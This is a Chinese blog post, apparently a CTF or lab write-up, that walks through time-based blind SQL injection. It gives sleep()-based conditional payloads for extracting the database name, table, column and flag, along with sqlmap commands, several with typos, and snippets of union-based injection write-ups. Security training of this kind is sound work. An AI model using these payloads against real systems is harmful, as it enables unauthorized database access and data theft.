一次手工和工具的延時注入(時間注入)

2021-09-14 02:25:05 字數 1832 閱讀 2603

##利用函式sleep()讓伺服器休眠,通過休眠時間判斷執行的語句對錯,從而得到我們想要的資訊

1,判斷當前庫名的長度

and if (length(database())=8,0,sleep(5))#0

結果=8時網頁沒睡眠,可以判斷當前庫名有8個字元

2,猜庫名

and if (ascii(substr(database(),1,1))=115,0,sleep(5))

結果=115時網頁沒睡眠,可以判斷庫名第乙個字元對應的ascii碼為115 字元為s

判斷第二個字元

執行到最後得出全部字元為security,也就是當前庫名

第二個字元ascii等於101 字元為e

3,猜表名

security的第一張表的第乙個字元ascii為101,為字元e

4.手工注入知道了庫名,用sqlmap輔助操作查出表名

命令為:sqlmap.dy -u 「url」 --tables -d 「security」

5.知道表名了,查我們想要的表的字段

手工語句:and if((select ascii(substr((select column_name from information_schema.columns where table_name="zkaq"limit 0,1),1,1)))=101,0,sleep(5))

sqlmap命令為sqlmap.dy -u 「url」 --columns -t 「zkaq」

6.查字段內容

手工語句:and if((select ascii(substr((select zkaq from zkaq where flag=「10」),1,1)))=101,0,sleep(5))

sqlmap工具命令:sqlmap.py -u"" --dump -t 「zkaq」 -c 「flag」,

找到flag,本題完成

一次簡單手工注入

注入點http news.php?newsid 18 收集了下ip,不能sqlmap了,就只能手工了。經典 and 1 1 1 2 一直報錯,感覺是被過濾了,後面使用注釋符也不行 使用union select 1,2,3也報錯,確定不了字段數。成功payload union select 1,2,c...

一次簡單的純手工顯錯注入

注 這裡還要利用到了乙個函式group concat 意思是將查詢的結果併排 拼接一起展示,不然輸出點只能顯示乙個表名或者字段 1.利用and1 1 顯示正常,and 1 2 顯示錯誤頁面。證明有注入點 2。order by 語句查詢有幾個字段,為了後面使用聯合查詢 例如,order by 4 出錯...

記一次操蛋的mysql注入之旅

最近開始學習web安全的知識,剛好學完mysql注入這塊,趕緊找個 練練手,整個過程很順利,但是結果很操蛋。我還是個小菜鳥,各位大神看了輕噴.站點 馬賽克遮體 1.注入點檢測 and 1 1 結果正常 and 1 2 結果為空 勤奮的孩子運氣不會差,一出手就發現了注入點,下面就開始一步步開搞。2.猜...